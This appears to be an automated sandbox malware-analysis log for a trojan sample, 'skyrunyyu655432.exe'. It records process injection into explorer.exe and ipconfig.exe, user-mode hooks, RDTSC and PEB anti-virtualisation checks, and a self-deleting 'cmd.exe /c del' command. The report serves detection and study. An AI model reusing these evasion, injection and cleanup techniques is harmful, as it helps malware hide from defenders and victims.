          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA360 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA410 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA490 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA35A NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA45A NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DA492 NtClose,
          Source: skyrunyyu655432.exeVirustotal: Detection: 42%
          Source: skyrunyyu655432.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile read: C:\Users\user\Desktop\skyrunyyu655432.exeJump to behavior
          Source: skyrunyyu655432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\skyrunyyu655432.exe "C:\Users\user\Desktop\skyrunyyu655432.exe"
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile created: C:\Users\user\AppData\Local\Temp\nspF161.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@2/2
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: ipconfig.pdb source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\drzmu\ggsdfz\yvaw\e1787da5c4714b909513c5a841b06b91\ftesxt\xwtvbdyl\Release\xwtvbdyl.pdb source: skyrunyyu655432.exe, 00000000.00000002.321823751.000000000040B000.00000004.00000001.01000000.00000003.sdmp, skyrunyyu655432.exe, 00000000.00000002.322060613.000000000275C000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000002.292672930.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000002.00000000.279753075.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000003.00000000.287892253.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, ipconfig.exe, 0000000D.00000002.547054865.00000000030DF000.00000004.10000000.00040000.00000000.sdmp, nspF162.tmp.0.dr, jfotlqeoqb.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001EF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001EF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_004168D5 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00416CD3 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00417CF5 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D68D5 push ebp; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DE9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D6CD3 push esi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D7CF5 pushfd ; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD4B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD56C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD50B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD502 push eax; ret
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000024C9904 second address: 00000000024C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000024C9B7E second address: 00000000024C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6276Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeAPI coverage: 5.2 %
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 8.3 %
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.317703747.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.326481142.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000006.00000000.326503153.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.410432696.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.328565988.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000006.00000000.353562896.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.317703747.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001EE891 _memset,IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F4395 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F538A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_016503F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_01650772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_01650736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_0165061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_016506F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C57794 mov eax, dword ptr fs:[00000030h]
